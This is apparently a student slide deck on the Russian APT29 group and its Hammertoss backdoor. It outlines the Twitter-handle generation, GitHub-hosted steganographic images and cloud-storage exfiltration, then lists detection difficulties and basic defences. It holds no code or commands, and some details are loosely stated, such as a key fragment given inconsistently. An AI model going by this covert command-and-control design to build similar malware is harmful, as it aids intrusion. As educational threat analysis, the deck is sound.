APT29 HAMMERTOSS

JAYAKRISHNAN M

CONTENTS

• What is APT?• Who is APT29?• Introduction to Hammertoss• 5 Stages of Hammertoss• Detection and Prevention• Conclusion

WHAT IS APT?• Advanced:

Combine multiple attack methods.

Develop or buy zero-day exploits.

High Sophistication.

• Persistent: Avoids detection.

Harvest information over long time.

“Low and Slow” approach.

• Threat: Skilled, motivated, organized and well funded criminal organizations.

Not malware/exploit/attack alone.

WHO USES APT?

• Nations.

• Organized Crime Groups.

• Hacktivist Groups.

TARGETS

• Business Organizations.

• Political Targets.

• Nations.

• APT29 – Russian Advanced Persistent Threat Group.

• Operating from late 2014.

• Suspected to be sponsored by Russian Government.

• Cease operations on Russian holidays.

• Workhours aligned to UTC +3 time zone.

• Disciplined and Consistent.

• Uses Anti Forensic techniques and monitor victim remediation efforts.

• Attacked US Department of Defense Email System in 2014.

• Was able to read President Barack Obama’s unclassified emails.

• Led to a partial shut down of White House email systems.

• Used DDoS.

• Gathered massive amount of information.

• Distributed to thousands of Internet accounts within minutes.

HAMMERTOSS

• Stealthy Malware.• Discovered by FireEye in 2015.• Used as backdoor by attackers who have gained access to network.• Communication – low, slow and obfuscated.• Very difficult to detect.• Uses twitter, github and cloud storage.

VARIANTS

2 variants – both written in C#.• UPLOADER• tDiscoverer

UPLOADER

• Hard Coded server for its CnC.• Goes to specific page.• Obtain image with specific size.

TDISCOVERER

• More obfuscation.• Goes to twitter account to obtain CnC URL.• Acquire target image from URL.

5 STAGES OF HAMMERTOSS

1 2

3

4

5

Use steganography to hide instructions

Creates twitter handle

URL to image in github

Download image containing payload

Execute commands

STAGE 1: COMMUNICATION BEGINS WITH TWITTER

1. Hammertoss (HT) contains algorithm to generate Twitter handles.• Twitter handle: User ID in Twitter.

2. HT visits twitter URL.

3. A. APT 29 operator registers handle.• Tweet instructions.

• HT gets instruction from tweet.

B. Operator does not register handle.• HT waits till next day.

• Begin process again.

• ALGORITHMUses a base name. eg: “Bob”.Appends and prepends CRC32 values based on current date.Eg: 1abBob52b

STAGE 1: COMMUNICATION BEGINS WITH TWITTER

• APT29 knows algorithm to generate handles.

• Chooses to register a handle.

• Post obfuscated instruction to handle.

• APT 29 restricts: Checking twitter handles on weekdays.

Specify start date.

STAGE 1: COMMUNICATION BEGINS WITH TWITTER

STAGE 2:TWEETING URL, FILE SIZE, PART OF KEY

• Once registered, tweet a URL and a hash tag.

• Eg. doctorhandbook.com #101docto

URL: Download content hosted at specified URL.

101 – Location within the image file. Instruction starts from 101 byte.doco – Part of decryption key.

STAGE 3: DOWNLOAD IMAGE FROM GITHUB

• APT29’s operator registers github page and upload images.

• Use IE application COM object to visit and download image.

STAGE 4: USING STEGANOGRAPHY

• APT29 uses basic steganography.

• Steganography – Practice of concealing message in images.

1. Download image from specified URL.• Retrieve’s image from browser cache.

• Searches for any image having size at least that of offset specified in stage 2.

2. Image looks normal- encrypted with commands.

3. Decryption key -> hard coded key + characters obtained from tweet in stage 2.

4. Data includes commands or login credentials.

STAGE 5: EXECUTING COMMANDS AND UPLOADING VICTIM DATA

• Creates cloud storage account.

• Obtains victim data from cloud storage service.

DETECTION AND PREVENTION - CHALLENGES• Difficulty in identifying Twitter Accounts.

Requires access to HT binary.

Reverse engineer to identify base name and algorithm.

Generates 100’s of accounts but registers only few.

• Discovering legitimate and malicious traffic. Usage of SSL connection for encrypted communication.

• Locating payload. Usage of steganography and varying image size.

Need of decryption key.

DETECTION AND PREVENTION

• No current ways to prevent infection.

• Ensure OS and all third party applications are updated.

• Disable any browser plugin not needed.

• Detect malicious HT processes running on network through endpoint monitoring.

• Investigating on data exfiltration.

CONCLUSION

• HT shows APT29’s ability to adapt quickly – avoids detection and removal.

• Very sophisticated attack.

• Not reported any use of ransomware as payload for HT.

• Takedown actions likely to be ineffective since state sponsored.

• Behavioral based analysis also fails because of large number of false positives.

THANK YOU